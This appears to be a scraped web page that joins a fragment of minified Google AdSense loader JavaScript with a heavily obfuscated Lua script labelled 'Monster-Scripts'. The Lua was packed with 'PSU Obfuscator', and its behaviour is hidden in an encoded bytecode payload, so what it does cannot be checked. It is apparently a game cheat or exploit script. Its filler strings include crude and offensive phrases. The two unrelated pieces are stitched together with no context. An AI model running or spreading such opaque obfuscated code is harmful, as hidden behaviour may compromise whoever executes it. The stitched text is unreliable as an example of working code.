g={};g=(g.google_reactive_ad_format=tc,g.google_allow_expandable_ads=jc,g);e=g.hasOwnProperty(f)?g[f](e,null):e;null===e||(b[f]=e)}}}}function Xj(a){if(a=Bc(a))switch(a.data&&a.data.autoFormat){case "rspv":return 13;case "mcrspv":return 15;default:return 14}else return 12}function Yj(a,b,c){Wj(a,b);if(c.document&&c.document.body&&!kj(b)&&!b.google_reactive_ad_format){var d=parseInt(a.style.width,10),e=wj(a,c);if(0<e&&d>e){var f=parseInt(a.style.height,10);d=!!Pb[d+"x"+f];var g=e;if(d){var h=Qb(e,f);if(h)g=h,b.google_ad_format=h+"x"+f+"_0ads_al";else throw new L("No slot size for availableWidth="+e);}b.google_ad_resize=!0;b.google_ad_width=g;d||(b.google_ad_format=null,b.google_override_format=!0);e=g;a.style.width=e+"px";f=Xi(e,"auto",c,a,b);g=e;f.a.Z(c,g,b,a);Ci(f,g,b);f=f.a;b.google_responsive_formats=null;f.minWidth()>e&&!d&&(b.google_ad_width=f.minWidth(),a.style.width=f.minWidth()+"px")}}d=a.offsetWidth||Bg(a,c,"width",F)||b.google_ad_width||0;a:{e=Ga(Xi,d,"auto",c,a,b,!1,!0);h=J(c,ag.c);var k=J(c,ag.g);f=J(c,dg.c);g=J(c,dg.g);var m=Ih(c,11,b.google_ad_client),n=J(c,fg.g);var u=b.google_ad_client;u=null!=Gh(c,void 0===u?"":u);if(!(h||k||m||u)||!Vb()||b.google_reactive_ad_format||kj(b)||qg(a,b)||b.google_ad_resize||Lc(c)!=c)d=!1;else{for(k=a;k;k=k.parentElement)if(m=$b(k,c),!m||!Oa(["static","relative"],m.position)){d=!1;break a}if(!0!==vg(c,a,d,.3,b))d=!1;else{b.google_resizing_allowed=!0;k=Bh(c.location,"google_responsive_slot_debug");m=O(zf(),142);if(k||Math.random()<m)b.ovlp=!0;h||g||n?(h={},Ci(e(),d,h),b.google_resizing_width=h.google_ad_width,b.google_resizing_height=h.google_ad_height,h.ds&&(b.ds=h.ds),b.iaaso=!1):(b.google_ad_format="auto",b.iaaso=!0,b.armr=1);(d=f?"AutoOptimizeAdSizeVariant":g?"AutoOptimizeAdSizeOriginal":null)&&(b.google_ad_channel=b.google_ad_channel?[b.google_ad_channel,d].join("+"):d);d=!0}}}if(e=kj(b))lj(e,a,b,c,d);else{if(qg(a,b)){if(d=$b(a,c))a.style.width=d.width,a.style.height=d.height,pg(d,b);b.google_ad_width||(b.google_ad_width=a.offsetWidth);b.google_ad_height||(b.google_ad_height=a.offsetHeight);b.google_loader_features_used=256;b.google_responsive_auto_format=Xj(c)}else pg(a.style,b),300==b.google_ad_width&&250==b.google_ad_height&&(d=a.style.width,a.style.width="100%",e=a.offsetWidth,a.style.width=d,b.google_available_width=e);c.location&&"#gfwmrp"==c.location.hash||12==b.google_responsive_auto_format&&"true"==b.google_full_width_responsive&&!J(c,Mf.g)?lj(10,a,b,c,!1):J(c,Nf.g)&&12==b.google_responsive_auto_format&&(a=wg(a.offsetWidth||parseInt(a.style.width,10)||b.google_ad_width,c,a,b),!0!==a?(b.efwr=!1,b.gfwrnwer=a):b.efwr=!0)}};function Zj(a){var b;this.b=b=void 0===b?document:b;this.h=void 0===a?0:a;this.f=ak(this,"__gads=");this.i=!1;this.a=null;this.s=!1;bk(this)}Zj.prototype.w=function(a){this.h=a;bk(this)};function ck(a,b){var c=Vd;var d=void 0===d?dk:d;1!=a.h&&(a.f||a.i)&&(D._setgfp_=Ud(c,629,function(e){delete D._setgfp_;if(!e)throw Error("Invalid JSONP response");if(e=e._cookies_){var f=e[0];if(!f)throw Error("Invalid JSONP response");var g=f._value_,h=f._expires_;e=f._path_;f=f._domain_;if(!(q(g)&&pa(h)&&q(e)&&q(f)))throw Error("Invalid JSONP response");var k=new Nb;g=Ib(k,1,g);h=Ib(g,2,h);e=Ib(h,3,e);e=[Ib(e,4,f)];e.length&&(a.a=e[0],e=a.a&&y(a.a,1))&&(a.f=e,null!=a.a&&a.f&&(e=new Date,e.setTime(1E3*y(a.a,2)),f="."+y(a.a,4),e="__gads="+a.f+("; expires="+e.toGMTString())+("; path="+y(a.a,3)+"; domain="+f),a.b.cookie=e))}}),Zb(a.b,d({domain:a.b.domain,clientId:b,value:a.f,cookieEnabled:a.i})))}function dk(a){var b=a.value,c=a.cookieEnabled;a="https://partner.googleadservices.com/gampad/cookie.js?domain="+a.domain+"&callback=_setgfp_&client="+a.clientId;b&&(a+="&cookie="+encodeURIComponent(b));c&&(a+="&cookie_enabled=1");return a}function bk(a){if(!a.f&&!a.s&&1!=a.h){a.b.cookie="GoogleAdServingTest=Good";var b="Good"===ak(a,"GoogleAdServingTest=");if(b){var c=a.b,d=new Date;d.setTime((new Date).valueOf()+-1);c.cookie="GoogleAdServingTest=; expires="+d.toGMTString()}a.i=b;a.s=!0}}function ak(a,b){a=a.b.cookie;var c=a.indexOf(b);if(-1===c)return"";b=c+b.length;c=a.indexOf(";",b);-1==c&&(c=a.length);return a.substring(b,c)};function ek(a){return Kc.test(a.className)&&"done"!=a.getAttribute("data-adsbygoogle-status")}function fk(a,b){var c=window;a.setAttribute("data-adsbygoogle-status","done");gk(a,b,c)}function gk(a,b,c){var d=Jc();d.google_spfd||(d.google_spfd=Yj);(d=b.google_reactive_ads_config)||Yj(a,b,c);if(!hk(a,b,c)){d||(c.google_lpabyc=Nh(c,a));if(d){d=d.page_level_pubvars||{};if(I(D).page_contains_reactive_tag&&!I(D).allow_second_reactive_tag){if(d.pltais){Oc(!1);return}throw new L("Only one 'enable_page_level_ads' allowed per page.");}I(D).page_contains_reactive_tag=!0;Oc(7===d.google_pgb_reactive)}else Fc(c);if(!I(D).per_pub_js_loaded){I(D).per_pub_js_loaded=!0;try{c.localStorage.removeItem("google_pub_config")}catch(e){}}Dc(Cj,function(e,f){b[f]=b[f]||c[f]});b.google_loader_used="aa";b.google_reactive_tag_first=1===(I(D).first_tag_on_page||0);be(164,function(){Tj(c,b,a)})}}function hk(a,b,c){var d=b.google_reactive_ads_config;if(d){var e=d.page_level_pubvars;var f=(za(e)?e:{}).google_tag_origin}e=q(a.className)&&/(\W|^)adsbygoogle-noablate(\W|$)/.test(a.className);var g=b.google_ad_slot;var h=f||b.google_tag_origin;f=I(c);Pc(f.ad_whitelist||[],g,h)?g=null:(h=f.space_collapsing||"none",g=(g=Pc(f.ad_blacklist||[],g))?{ma:!0,ya:g.space_collapsing||h}:f.remove_ads_by_default?{ma:!0,ya:h,ca:f.ablation_viewport_offset}:null);if(g&&g.ma&&"on"!=b.google_adtest&&!e&&(e=Hg(a,c),!g.ca||g.ca&&(e||0)>=g.ca))return a.className+=" adsbygoogle-ablated-ad-slot",c=c.google_sv_map=c.google_sv_map||{},d=Aa(a),c[b.google_element_uid]=b,a.setAttribute("google_element_uid",d),"slot"==g.ya&&(null!==ic(a.getAttribute("width"))&&a.setAttribute("width",0),null!==ic(a.getAttribute("height"))&&a.setAttribute("height",0),a.style.width="0px",a.style.height="0px"),!0;if((e=$b(a,c))&&"none"==e.display&&!("on"==b.google_adtest||0<b.google_reactive_ad_format||d))return c.document.createComment&&a.appendChild(c.document.createComment("No ad requested because of display:none on the adsbygoogle tag")),!0;a=null==b.google_pgb_reactive||3===b.google_pgb_reactive;return 1!==b.google_reactive_ad_format&&8!==b.google_reactive_ad_format||!a?!1:(p.console&&p.console.warn("Adsbygoogle tag with data-reactive-ad-format="+b.google_reactive_ad_format+" is deprecated. Check out page-level ads at https://www.google.com/adsense"),!0)}function ik(a){var b=document.getElementsByTagName("INS");for(var c=0,d=b[c];c<b.length;d=b[++c]){var e=d;if(ek(e)&&"reserved"!=e.getAttribute("data-adsbygoogle-status")&&(!a||d.id==a))return d}return null}function jk(){var a=Rb(document,"INS");a.className="adsbygoogle";a.className+=" adsbygoogle-noablate";kc(a);return a}function kk(a){var b={};Dc(md,function(e,f){!1===a.enable_page_level_ads?b[f]=!1:a.hasOwnProperty(f)&&(b[f]=a[f])});za(a.enable_page_level_ads)&&(b.page_level_pubvars=a.enable_page_level_ads);var c=jk();Ob.body.appendChild(c);var d={};d=(d.google_reactive_ads_config=b,d.google_ad_client=a.google_ad_client,d);d.google_pause_ad_requests=I(D).pause_ad_requests||!1;fk(c,d)}function lk(a){return"complete"==a.readyState||"interactive"==a.readyState}function mk(a){function b(){return kk(a)}var c=void 0===c?Ob:c;var d=Mc(window);if(!d)throw new L("Page-level tag does not work inside iframes.");ng(d).wasPlaTagProcessed=!0;if(c.body||lk(c))b();else{var e=Ra(ce(191,b));rc(c,"DOMContentLoaded",e);(new p.MutationObserver(function(f,g){c.body&&(e(),g.disconnect())})).observe(c,{childList:!0,subtree:!0})}}function nk(a){var b={};be(165,function(){ok(a,b)},function(c){c.client=c.client||b.google_ad_client||a.google_ad_client;c.slotname=c.slotname||b.google_ad_slot;c.tag_origin=c.tag_origin||b.google_tag_origin})}function pk(a){delete a.google_checked_head;ec(a,function(b,c){Rc[c]||(delete a[c],b=c.replace("google","data").replace(/_/g,"-"),p.console.warn("AdSense head tag doesn't support "+b+" attribute."))})}function qk(a){var b=D._gfp_;if(void 0===b||1===b)J(D,Sf.g)?ck(D._gfp_=new Zj(b?1:0),a):D._gfp_=2}function rk(){var a=yf(201),b=J(D,Zf.g),c=J(D,Zf.c);return b||a&&!c}function ok(a,b){if(null==a)throw new L("push() called with no parameters.");Ha=(new Date).getTime();Mj();a:{if(void 0!=a.enable_page_level_ads){if(q(a.google_ad_client)){var c=!0;break a}throw new L("'google_ad_client' is missing from the tag config.");}c=!1}if(c)sk(a,b);else if((c=a.params)&&Dc(c,function(e,f){b[f]=e}),"js"===b.google_ad_output)console.warn("Ads with google_ad_output='js' have been deprecated and no longer work. Contact your AdSense account manager or switch to standard AdSense ads.");else{a=tk(a.element);Wj(a,b);c=I(p).head_tag_slot_vars||{};ec(c,function(e,f){b.hasOwnProperty(f)||(b[f]=e)});if(a.hasAttribute("data-require-head")&&!I(p).head_tag_slot_vars)throw new L("AdSense head tag is missing. AdSense body tags don't work without the head tag. You can copy the head tag from your account on https://adsense.com.");if(rk()&&!b.google_ad_client)throw new L("Ad client is missing from the slot.");var d=(c=0===(I(D).first_tag_on_page||0)&&Lh(b))&&Mh(c);c&&!d&&(sk(c),I(D).skip_next_reactive_tag=!0);0===(I(D).first_tag_on_page||0)&&(I(D).first_tag_on_page=2);qk(b.google_ad_client);b.google_pause_ad_requests=I(D).pause_ad_requests||!1;fk(a,b);c&&d&&uk(c)}}function uk(a){function b(){ng(p).wasPlaTagProcessed||p.adsbygoogle&&p.adsbygoogle.push(a)}lk(Ob)?b():rc(Ob,"DOMContentLoaded",Ra(b))}function sk(a,b){if(I(D).skip_next_reactive_tag)I(D).skip_next_reactive_tag=!1;else{0===(I(D).first_tag_on_page||0)&&(I(D).first_tag_on_page=1);b&&a.tag_partner&&(Nc(p,a.tag_partner),Nc(b,a.tag_partner));a:if(!I(D).ama_ran_on_page){try{var c=p.localStorage.getItem("google_ama_config")}catch(z){c=null}try{var d=c?new dd(c?JSON.parse(c):null):null}catch(z){d=null}if(b=d)if(c=B(b,fd,3),!c||y(c,1)<=+new Date)try{p.localStorage.removeItem("google_ama_config")}catch(z){me(p,{lserr:1})}else{if(Mh(a)&&(c=nd(p.location.pathname,C(b,gd,7)),!c||!Fb(c,8)))break a;I(D).ama_ran_on_page=!0;B(b,jd,13)&&1===y(B(b,jd,13),1)&&(c=0,B(B(b,jd,13),kd,6)&&y(B(B(b,jd,13),kd,6),3)&&(c=y(B(B(b,jd,13),kd,6),3)||0),d=I(p),d.remove_ads_by_default=!0,d.space_collapsing="slot",d.ablation_viewport_offset=c);mf(3,[Jb(b)]);c=a.google_ad_client;d=he(je,new ge(null,ne(za(a.enable_page_level_ads)?a.enable_page_level_ads:{})));try{var e=nd(p.location.pathname,C(b,gd,7)),f;if(f=e)b:{var g=y(e,2);if(g)for(var h=0;h<g.length;h++)if(1==g[h]){f=!0;break b}f=!1}if(f){if(y(e,4)){f={};var k=new ge(null,(f.google_package=y(e,4),f));d=he(d,k)}var m=new mh(c,b,e,d),n=new rh;(new wh(m,n)).start();var u=n.b;var w=Ga(zh,p);if(u.b)throw Error("Then functions already set.");u.b=Ga(yh,p);u.f=w;uh(u)}}catch(z){me(p,{atf:-1})}}}mk(a)}}function tk(a){if(a){if(!ek(a)&&(a.id?a=ik(a.id):a=null,!a))throw new L("'element' has already been filled.");if(!("innerHTML"in a))throw new L("'element' is not a good DOM element.");}else if(a=ik(),!a)throw new L("All ins elements in the DOM with class=adsbygoogle already have ads in them.");return a}function vk(){Zd();Vd.s=ee;be(166,wk)}function wk(){var a=Cc(Bc(D))||D,b=I(a);if(!b.plle){b.plle=!0;var c=[null,null];try{var d=JSON.parse("[[[175,null,null,[1]]],[[12,[[1,[[21064123],[21064124]]]]],[10,[[10,[[20040008],[20040009,[[182,null,null,[1]]]]]],[1,[[21062810],[21062811]]],[1,[[21063996],[21063997,[[160,null,null,[1]]]]]],[50,[[21064339],[21064340,[[186,null,null,[1]]]]]],[50,[[21064380],[21064381,[[196,null,null,[1]]]]]],[1000,[[368226200,null,[2,[[12,null,null,5,null,null,\x22[02468]$\x22,[\x229\x22]],[7,null,null,5,null,2,null,[\x229\x22]]]]],[368226201,null,[2,[[12,null,null,5,null,null,\x22[13579]$\x22,[\x229\x22]],[7,null,null,5,null,2,null,[\x229\x22]]]]]]],[1000,[[368845002,null,[2,[[12,null,null,5,null,null,\x22[13579]$\x22,[\x224\x22]],[7,null,null,5,null,2,null,[\x224\x22]]]]],[368885001,null,[2,[[12,null,null,5,null,null,\x22[02468]$\x22,[\x224\x22]],[7,null,null,5,null,2,null,[\x224\x22]]]]]]]]],[11,[[10,[[248427477],[248427478,[[154,null,null,[1]]]]]]]]]]")}catch(m){d=c}mf(13,[d]);ti(new ei(d),Zh(a));Cf.j().a(12);Cf.j().a(10);b.eids=Ka(Cf.j().b(),String).concat(b.eids||[]);b=b.eids;d=zf();zc=!0;c=zf();var e=Mc(a)||a;e=Bh(e.location,"google_responsive_slot_debug")||Bh(e.location,"google_responsive_slot_preview");var f=Ih(a,11);var g=null!=Gh(a,"");e?(e=ag,f=cg,c=e.g):g?(e=fg,f=gg,c=T(a,new K(0,999,""),O(c,152),O(c,153),[e.c,e.g],2)):f?(e=dg,f=eg,c=T(a,new K(0,999,""),O(c,120),O(c,121),[e.c,e.g],2)):(e=ag,f=cg,c=T(a,Rh,O(c,96),O(c,97),[e.c,e.g]));c?(g={},e=(g[e.c]=f.c,g[e.g]=f.g,g)[c],c={Qa:c,Sa:e}):c=null;e=c||{};c=e.Qa;g=e.Sa;c&&g&&(S(b,c),S(b,g));e=Mf;c=wi(a,O(d,136),[e.c,e.g]);S(b,c);Ih(a,12)&&(e=Ff,f=Ef,c=T(a,new K(0,999,""),O(d,149),O(d,150),[e.c,e.g],4),S(b,c),c==e.c?g=f.c:c==e.g?g=f.g:g="",S(b,g));e=Jf;c=T(a,Oh,O(d,160),O(d,161),[e.c,e.R,e.P]);S(b,c);f=If;c==e.c?g=f.c:c==e.R?g=f.R:c==e.P?g=f.P:g="";S(b,g);e=Tf;S(b,T(a,Ph,O(d,9),O(d,10),[e.c,e.Da]));e=Hf;c=T(a,Uh,O(d,179),O(d,180),[e.c,e.U]);S(b,c);f=Gf;c==e.c?g=f.c:c==e.U?g=f.U:g="";S(b,g);e=$f;c=T(a,Xh,O(d,195),O(d,196),[e.c,e.g]);S(b,c);f=Zf;c==e.c?g=f.c:c==e.g?g=f.g:g="";S(b,g);e=Lf;c=T(a,Yh,O(d,199),O(d,200),[e.c,e.g]);S(b,c);f=Kf;c==e.c?g=f.c:c==e.g?g=f.g:g="";S(b,g);Ya("")&&S(b,"");e=Uf;c=wi(a,O(d,13),[e.o,e.c]);S(b,c);c=wi(a,0,[e.la]);S(b,c);e=Vf;c=wi(a,O(d,60),[e.o,e.c]);S(b,c);c==Vf.o&&(e=Wf,c=wi(a,O(d,66),[e.o,e.c]),S(b,c),e=Yf,c=wi(a,O(d,137),[e.o,e.c]),S(b,c),c==Wf.o&&(e=Xf,c=wi(a,O(d,135),[e.o,e.c]),S(b,c)));e=Nf;c=wi(a,O(d,98),[e.c,e.g]);S(b,c);e=Sf;c=wi(a,O(d,192),[e.c,e.g]);S(b,c);e=Of;c=T(a,Th,O(d,157),O(d,158),[e.c,e.B]);S(b,c);f=Pf;c==e.c?g=f.c:c==e.B?g=f.B:g="";S(b,g);e=Qf;c=T(a,Sh,O(d,173),O(d,174),[e.c,e.g]);S(b,c);f=Rf;c==e.c?g=f.c:c==e.g?g=f.g:g="";S(b,g);e=hg;c=T(a,Qh,O(d,99),O(d,100),[e.c,e.g]);S(b,c);f=ig;c==e.c?g=f.c:c==e.g?g=f.g:g="";S(b,g);e=jg;c=wi(a,O(d,165),[e.c,e.g]);S(b,c);e=P;c=T(a,Vh,O(d,189),O(d,190),[e.c,e.T,e.L,e.K,e.I,e.J]);S(b,c);f=kg;c==e.c?g=f.c:c==e.T?g=f.T:c==e.L?g=f.L:c==e.K?g=f.K:c==e.I?g=f.I:c==e.J?g=f.J:g="";S(b,g);e=lg;c=T(a,Wh,O(d,193),O(d,194),[e.c,e.aa,e.ba]);S(b,c);c=wi(a,O(d,185),["20199336","20199335"]);S(b,c);a=Mc(a)||a;Bh(a.location,"google_mc_lab")&&S(b,"242104166")}if(!t("Trident")&&!t("MSIE")||ub(11)){a=J(D,Wf.o)||J(D,Uf.o)||J(D,Uf.la);Xd(a);Ij();Fj(".google.dz")&&(Z[1]=".google.dz");Kj();if(a=Mc(p))a=ng(a),a.tagSpecificState[1]||(a.tagSpecificState[1]=new Ah);if(d=D.document.querySelector('script[src*="/pagead/js/adsbygoogle.js"][data-ad-client]:not([data-checked-head])')){d.setAttribute("data-checked-head","true");b=I(window);if(b.head_tag_slot_vars)throw new L("Only one AdSense head tag supported per page. The second tag is ignored.");a={};Wj(d,a);pk(a);d={};for(var h in a)d[h]=a[h];b.head_tag_slot_vars=d;h={};h=(h.google_ad_client=a.google_ad_client,h.enable_page_level_ads=a,h);D.adsbygoogle||(D.adsbygoogle=[]);a=D.adsbygoogle;a.loaded?a.push(h):a.splice(0,0,h)}h=window.adsbygoogle;if(!h||!h.loaded){a={push:nk,loaded:!0};try{Object.defineProperty(a,"requestNonPersonalizedAds",{set:xk}),Object.defineProperty(a,"pauseAdRequests",{set:yk}),Object.defineProperty(a,"setCookieOptions",{set:zk}),Object.defineProperty(a,"onload",{set:Ak})}catch(m){}if(h)for(b=ba(["requestNonPersonalizedAds","pauseAdRequests","setCookieOptions"]),d=b.next();!d.done;d=b.next())d=d.value,void 0!==h[d]&&(a[d]=h[d]);if(h&&h.shift)try{var k;for(b=20;0<h.length&&(k=h.shift())&&0<b;)nk(k),--b}catch(m){throw window.setTimeout(vk,0),m;}window.adsbygoogle=a;h&&(a.onload=h.onload)}}}function xk(a){if(+a){if((a=Yb())&&a.frames&&!a.frames.GoogleSetNPA)try{var b=a.document,c=new Sb(b),d=b.body||b.head&&b.head.parentElement;if(d){var e=Rb(c.a,"IFRAME");e.name="GoogleSetNPA";e.id="GoogleSetNPA";e.setAttribute("style","display:none;position:fixed;left:-999px;top:-999px;width:0px;height:0px;");d.appendChild(e)}}catch(f){}}else(b=Yb().document.getElementById("GoogleSetNPA"))&&b.parentNode&&b.parentNode.removeChild(b)}function yk(a){+a?I(D).pause_ad_requests=!0:(I(D).pause_ad_requests=!1,a=function(){if(!I(D).pause_ad_requests){var b=Jc(),c=Jc();try{if(Ob.createEvent){var d=Ob.createEvent("CustomEvent");d.initCustomEvent("adsbygoogle-pub-unpause-ad-requests-event",!1,!1,"");b.dispatchEvent(d)}else if(Ec(c.CustomEvent)){var e=new c.CustomEvent("adsbygoogle-pub-unpause-ad-requests-event",{bubbles:!1,cancelable:!1,detail:""});b.dispatchEvent(e)}else if(Ec(c.Event)){var f=new Event("adsbygoogle-pub-unpause-ad-requests-event",{bubbles:!1,cancelable:!1});b.dispatchEvent(f)}}catch(g){}}},p.setTimeout(a,0),p.setTimeout(a,1E3))}function zk(a){var b=D._gfp_;void 0===b||1===b?D._gfp_=a?1:void 0:b instanceof Zj&&b.w(a?1:0)}function Ak(a){Ec(a)&&window.setTimeout(a,0)};vk();}).call(this);
Monster-Scripts
local e=(function(n,e)return(n~=e);end)local e=(function(n,e)return(n>=e);end)local V=(function(n,e)return(n>e);end)local G=(function(n,e)return(n^e);end)local e=(function(n,e)return(n<=e);end)local a=(function(n,e)return(n==e);end)local e=(function(n,e)return(n<e);end)local N=(function(n,e)return(n-e);end)local e=(function(e,n)return(e..n);end)local M=(function(n,e)return(n%e);end)local D=(function(n,e)return(n+e);end)local x=(function(e,...)return e(...);end)local j=(function(e,n)return(e/n);end)local k=(function(e,n)return(e*n);end)for n,e in pairs({(function(c,...)_d9c022ff91464aed="This file was obfuscated using PSU Obfuscator 4.5.A | https://www.psu.dev/ & discord.gg/psu";local U=_d9c022ff91464aed local l=c.H0Qwk0iE0P;local ne=c[((#{651;}+592788173))];local oe=c[((249941293-#("this script was obfuscated using moonsec")))];local S=c.XgxDP;local ce=c.dVzJU9;local C=c[(807506878)];local i=c[((#{425;804;931;(function(...)return 928;end)()}+708256303))];local F=c[((343335178-#("strawberrys is a n-n-n-n-nn-n-n-n-n-n-n-n-nnn-n-n-n- i")))];local z=c.MQISOu;local ae=c.Ibp3hBf0;local y=c[((942953583-#("balls in yo jaws (yo jaws)")))];local n=c[((#{143;783;814;542;(function(...)return 63,570,58,...;end)(942,919,245,165)}+953720241))];local g=c[(566271629)];local xe=c.x79X9Yw;local de=c[((#{352;(function(...)return 852,573,798,347;end)()}+401278268))];local m=c['pUQwVV0'];local p=c.lBq8bnLzg;local o=c[((21591894-#("psudeobfuscator.tk")))];local te=c[((#{225;46;957;(function(...)return 795,444,844,450;end)()}+240712621))];local le=c[(305379501)];local L=c["btqlWDZBhG"];local B=c[(777371616)];local h=c[((#{767;343;790;127;(function(...)return 562,150;end)()}+149847516))];local r=c[(63487190)];local ee=c[((#{896;(function(...)return...;end)(255,381,786,221)}+860843683))];local W=c[((903466419-#("psu thighs")))];local J=c[(148932288)];local R=c[((126071811-#("nigmode")))];local X=c[((152219744-#("I love farting")))];local u=c[(167833402)];local Q=c.btCD0Ld0E6;local E=c[((537435825-#("like")))];local Z=c[((723896170-#("Noel is the best coder")))];local _=((getfenv)or(function(...)return(_ENV);end));local f,s,e=({}),(""),(_(l));local d=((e[""..c[r].."\105\116\51\50"])or(e["\98\105"..c[n]])or({}));local t=(((d)and(d["\98"..c[S]..c["x0r6Y0SDV"].."\114"]))or(function(e,n)local l,x=l,i;while((e>i)and(n>i))do local t,d=e%o,n%o;if t~=d then x=x+l;end;e,n,l=(e-t)/o,(n-d)/o,l*o;end;if e<n then e=n;end;while e>i do local n=e%o;if n>i then x=x+l;end;e,l=(e-n)/o,l*o;end;return(x);end));local b=(o^F);local w=(b-l);local I,P,v;local b=(s[""..c[Q].."\115"..c[B].."\98"]);local b=(s[""..c["uxMMflkQ"]..c[B]..c[r]]);local g=(s[""..c[r]..c[g]..c[n]..c[h]]);local K=(s[""..c[m]..c[y].."\97\114"]);local s=(e[""..c[n].."\121"..c[C].."\101"]);local O=(e[""..c[W].."\97\116"..c[y]]["\102"..c.Q0tip..c.x0r6Y0SDV.."\111"..c[u]]);local q=function(l,n,e)return e+n or l*e end;local Y=((e["\109"..c[E]..c[n]..c[y]]["\108\100"..c[h]..c[S].."\112"])or(function(e,n,...)return((e*o)^n);end));local T=(e[""..c["uxMMflkQ"]..c[h].."\108"..c[h]..c[m]..c[n]]);local s=((e["\117"..c[p]..c[C].."\97"..c[m]..c[z]])or(e[""..c[n]..c[E].."\98"..c.Q0tip.."\101"]["\117"..c[p].."\112\97"..c[m]..c[z]]));local H=(e[""..c[C]..c[E]..c["MGL80j2"]..c[u].."\115"]);local B=(e[""..c[n].."\111"..c[p]..c[B].."\109\98\101\114"]);local z=(e[""..c[C]..c[m].."\97"..c.Q0tip..c['Q0tip']]);local C=(e["\114\97\119"..c.uxMMflkQ.."\101\116"]);local C=(e["\115"..c[n].."\114\105"..c[p]..c[Q]]["\109\97\116\99\104"]);local Q=(e[""..c["uxMMflkQ"]..c[h]..c[n]..c[W]..c[h].."\116\97\116\97\98\108"..c[h]]);local W=(d[""..c[r].."\110\111"..c[n]])or(function(e,...)return(w-e);end);P=((d[""..c[u].."\115"..c[y].."\105\102"..c[n]])or(function(n,e,...)if(e<i)then return(I(n,-(e)));end;return(O(n%o^F/o^e));end));local w=(d["\98\111"..c[u]])or(function(e,n,...)return(w-v(w-e,w-n));end);I=((d[""..c.Q0tip.."\115\104\105\102\116"])or(function(n,e,...)if(e<i)then return(P(n,-(e)));end;return((n*o^e)%o^F);end));v=(d[""..c[r]..c[E]..c[p].."\100"])or(function(e,n,...)return(((e+n)-t(e,n))/o);end);if((not(e["\98"..c['MGL80j2']..c[n].."\51"..c[L]]))and(not(e[""..c[r]..c['MGL80j2']..c[n]])))then d[""..c[u].."\115\104"..c['MGL80j2'].."\102"..c[n]]=P;d[""..c[r].."\110"..c.x0r6Y0SDV..c[n]]=W;d["\98"..c[E].."\110"..c.iiq8EzS]=v;d[""..c[r].."\111\114"]=w;d["\98"..c[S].."\111"..c[u]]=t;d[""..c.Q0tip.."\115"..c[y].."\105"..c[de]..c[n]]=I;end;local o=(e["\116"..c[E].."\98\108\101"]["\105"..c[p].."\115\101"..c[u]..c[n]]);local w=(e[""..c[n]..c[E].."\98\108\101"][""..c[m].."\111"..c[p].."\99\97"..c[n]]);local p="\58"..c['qS5zSnQ0']..c[X].."\100"..c[oe].."\41"..c.omlHrPOTj;local o=(e["\116\97"..c[r]..c.Q0tip.."\101"]["\114\101\109"..c.x0r6Y0SDV.."\118\101"]);local y=(((e[""..c[n]..c[E].."\98\108\101"][""..c[m]..c[u]..c[h].."\97\116"..c[h]]))or((function(e,...)return({s({},i,e);});end)));e[""..c[r].."\105\116\51"..c[L]]=d;local e=((-R+(function()local o,n=i,l;(function(e)e(e(e))end)(function(e)if o>ae then return e end o=o+l n=(n+xe)%ee if(n%Z)>=ce then n=(n-ne)%te return e else return e(e(e and e))end return e(e(e))end)return n;end)()));local n,o=z(function(n)local e,o=n()local x,n=e(n(B),o)local o,e=e(q,i,nil,o)return B(C(e,p))-B(C(n,p))+l end,function(e)if e then return function(e)return e()end else return z,''end end) local n=(#U+le);local r,p=({}),({});for e=i,n-l do local n=K(e);r[e]=n;p[e]=n;p[n]=e;end;local E,o=(function(x)local o,t,d=g(x,o,J);if((o+t+d)~=((254-#("yo wtf"))))then e=e+(43);n=n+((227-#("Perth after saying literally the worst idea to ever exist every 5 minutes")));end;x=b(x,(5));local o,d,t=(""),(""),({});local e=l;local function c()local n=B(b(x,e,e),((#{14;687;632;}+33)));e+=l;local l=B(b(x,e,e+n-l),((#{275;535;745;(function(...)return;end)()}+33)));e+=n;return(l);end;o=p[c()];t[l]=o;while(e<#x)do local e=c();if r[e]then d=r[e];else d=o..b(o,l,l);end;r[n]=o..b(d,l,l);t[#t+l],o,n=d,d,n+l;end;return(w(t));end)("PSU|26s22U22s121022G22M1610102202131318111N21d23121a27c2361g1q1p1I101M1h2261l1022k1S1Q1r1a1n22K226121n1t161121D21l19101r17171h1l1321821b1s1d1I171t1a22521v1T21V24K24D1a27C2241z1821G21i1n141v1a1623S26L27c29e1021S1321y1527c22821D1F1q1726v21021h25224j26t25n22d25W24O2491e27c22621n1o1F171N1x21i1k141G1B1D1621P22K1427C22c21D1t1C2311H1827c239161m1N161d191l24k25V27s1022B21K1A1L1h171d1E1J1m21G21O1D1L1i191t1v2381t2aK1022Q1D101324T25g29k1022S2132181V1926z23W2a210236171r21D2181m2Av2A821m21F1P1k21L27A27C22X28R2aw1626B24127b2B521i1919161N24f26M2BY22U2bB1v1M26q2cT27c21Y21G1j1C1822c26F2651b27c2212101c161221221813131t21t26q25M2Dj102242191O1M1Q1121n21p1m27i1V22w2by22c2121j181522W2dE27c22v121h1n1h1t1S101u22U2Dy21v2c21921P2191Q1g1c1t1m1922v2901021z1y1h2102Bh1O1s1N1124L26728E1022x1Q21821O12122af111922Y1727C21V2eN111D1t1725z23Z22f25422j1326j25825w24324R2Fx1022a21f16131B131025c24l2FL22c1Z27s1B213213181925322122o27122423l24R23k25x26H2621c27C22R2AF1618122a71d151V1j24K2601p27C21w2f0171l1f2Ag21x182301X13171K1P1O1H1121w22C1r2271H1o22Y2262bT1022821R161729P1W29629829a25l24k2aS1022c21P141821x23421R1s21v2531n2292661R24E24I23r22x2662IT292181X2Dc2DE2231W2C722A21j1b1A27i2aA1h102G3191k21V21c29f1w22521926k2gf29l2871m27U1725426Z1g27C22021p1o1c1F112aY21i21P28f21021d1J1626u23t2dy2AM2Ao2132iO2991626q28z27c2Fa1h2ky2972L01W21x29f25C24q21623422B1X22e21g2122Dg23U25W26e2iG21y21B29K2142191R2AX28828A1123329f1021W141O2aj27c22u1F2LW22r21C26y26l2692692611t26224o24b2hB2f92122DE21i21I2jt2Jv1k24L25z1127C21323v2IS2cn1Q1L1927g27I26423325726x23g26L23M21t26m24O23q2jt1023727U1s2g110111B1U122bM1L2AX1d25623i2211d22U24u1x25w26z25W26N2Bq2311c1l1s25i2232261e22i25O25522c26925w26l2Cu23421l2131U151125125i2gg2NM2l82Iq2592NK22B21e1o21G2141m101i2Do21j21j2aC1G1M1726u23P2gg22v181B192fs1124m23S22o23726F1P22S1c26p26f24N23J25825f24n25825226L25U29D29F21K23c25e23v2fl22d1x1T15151t2aO1m21c2232IT2hD2b017131H1C22X2i12FY2172b0102i626325A152r11022e2gJ1n1R1t21s2352272MN2jn131k1n1M1r220224152